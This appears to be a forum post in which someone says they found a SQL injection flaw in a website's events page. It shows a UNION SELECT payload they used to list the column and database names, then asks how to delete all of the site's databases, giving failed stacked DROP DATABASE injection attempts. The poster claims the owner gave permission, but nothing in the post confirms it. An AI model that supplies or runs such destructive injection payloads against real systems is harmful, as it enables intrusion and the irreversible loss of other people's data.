I am currently working on SQL Injection Vulnerability of websites..http://xyz(removed
on opening it I found that it is vulnerable to attacks..
UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()--
I found vulnerable number that was 24, and so this url was working and displaying all coloum names, similarly i found all the databases names too...
Now, what i have to do is to delete all the databases from this...
What should i do ?
Need help in this thing...
I have tried this :http://xyz.com/events/events.php?event=74';
DROP DATABASE *;#http://xyz.com/events/events.php?event=74';
DROP DATABASE 'testDB';#
(testDB is database on the phpmyadmin)
But it is not working...NOTE : THE SITE I AM WORKING ON IS OF MY COLLEGE`s SENIOR AND I HAVE TAKEN ALL PERMISSIONS TO DO SO.
Thanks in advance....